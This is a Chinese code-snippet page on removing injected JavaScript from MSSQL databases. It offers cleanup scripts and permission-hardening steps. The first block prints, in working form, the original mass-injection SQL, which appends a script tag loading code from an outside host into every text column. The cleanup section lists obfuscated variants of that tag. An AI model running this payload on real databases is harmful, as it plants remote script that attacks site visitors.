清除js注入的sql语句代码,MSSQL代码库,德仔网

代码语言
代码分类
【MSSQL】清除js注入的sql语句
作者:Dezai.CN / 发布于2011/8/22/ 867
<div>
Declare @T Varchar(255),@C Varchar(255) 
Declare Table_Cursor Cursor For 
Select A.Name,B.Name From Sysobjects A,Syscolumns B Where A.Id=B.Id And A.Xtype='u' And (B.Xtype=99 Or B.Xtype=35 Or B.Xtype=231 Or B.Xtype=167)
Open Table_Cursor 
Fetch Next From Table_Cursor Into @T,@C
While(@@Fetch_Status=0) 
Begin 
Exec('update ['+@T+'] Set ['+@C+']=Rtrim(Convert(Varchar(8000),['+@C+']))+''<script src=http://3b3.org/c.js></script>''')
Fetch Next From Table_Cursor Into @T,@C 
End 
Close Table_Cursor 
Deallocate Table_Cursor
消除注入代码的逆操作SQL
Declare @T Varchar(255),@C Varchar(255) 
Declare Table_Cursor Cursor For 
Select A.Name,B.Name From Sysobjects A,Syscolumns B Where A.Id=B.Id And A.Xtype='u' And (B.Xtype=99 Or B.Xtype=35 Or B.Xtype=231 Or B.Xtype=167)
Open Table_Cursor 
Fetch Next From Table_Cursor Into @T,@C
While(@@Fetch_Status=0) 
Begin 
Exec('update ['+@T+'] Set ['+@C+']=replace(['+@C+'],''<script src=http://3b3.org/c.js></script>'','''')')
Fetch Next From Table_Cursor Into @T,@C 
End 
Close Table_Cursor 
Deallocate Table_Cursor
--------------------------------------------------------------------
清除并防止C.JS注入MSSQL数据库 收藏 
----------------- 清理数据库注入代码 ----------------
declare @delStr varchar(8000)
set @delStr='<script src=http://3%62omb.com/c.js></script>'
set @delStr='<script src=http://3bomb.%63%6Fm/c.js></script>'
set @delStr='<script src=http://3b%6F%6Db.com/c.js></script>'
set @delStr='<script src=http://%33bomb.com/c.js></script>'
set @delStr='<script src=http://3bomb.co%6D/c.js></script>'
set @delStr='<script src=http://3bom%62%2Ecom/c.js></script>'
set @delStr='<script src=http://3b%6Fmb.com/c.js></script>'
set @delStr='<script src=http://3bomb.c%6Fm/c.js></script>'
set @delStr='<script src=http://%33%62omb.com/c.js></script>'

set nocount on
declare @tableName nvarchar(100),@columnName nvarchar(100),@tbID int,@iRow int,@iResult int
declare @sql nvarchar(500)
set @iResult=0
declare cur cursor for
select name,id from sysobjects where xtype='U'
open cur
fetch next from cur into @tableName,@tbID
while @@fetch_status=0
begin
declare cur1 cursor for
--xtype in (231,167,239,175,99,35) 为char,varchar,nchar,nvarchar,ntext,text类型
select name from syscolumns where xtype in (231,167,239,175,99,35) and <a href="mailto:id=@tbID">id=@tbID</a> 
open cur1
fetch next from cur1 into @columnName
while @@fetch_status=0
begin
set @sql='update [' + @tableName + '] set ['+ @columnName +']= replace(cast(['+@columnName+'] as varchar(8000)),'''+@delStr+''','''') where ['+@columnName+'] like <a>''%'+@delStr+'%'''</a> 
--update tablename set fieldA=replace(cast(fieldA as varchar(8000)) ,'aa','bb')这样的语句。
exec sp_executesql @sql 
set @iRow=@@rowcount
set @iResult=@iResult+@iRow
if @iRow>0
begin
print '表：<a>'+@tableName+'</a> ,列:'+@columnName+'被更新'+convert(varchar(10),@iRow)+'条记录;'
end 
fetch next from cur1 into @columnName

end
close cur1
deallocate cur1
fetch next from cur into @tableName,@tbID
end
print '数据库共有'+convert(varchar(10),@iResult)+'条记录被更新!!!'
close cur
deallocate cur
set nocount off

----------------彻底杜绝SQL注入 ---------------
1.不要使用sa用户连接数据库 
2、新建一个public权限数据库用户，并用这个用户访问数据库 
3、[用户]用户名称-> 右键－属性－权限－在sysobjects与syscolumns上面打&ldquo;&times;&rdquo; 
4、[角色]去掉角色public对sysobjects与syscolumns对象的select访问权限 
5、通过以下代码检测（失败表示权限正确，如能显示出来则表明权限太高）： 
DECLARE @T varchar(255), @C varchar(255) 
DECLARE Table_Cursor CURSOR FOR 
Select a.name,b.name from sysobjects a,syscolumns b 
where a.id=b.id and a.xtype= 'u ' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0) 
BEGIN print @c
FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor

</div>
试试其它关键字
同语言下
可能有用的
Dezai.CN贡献的其它代码(4037)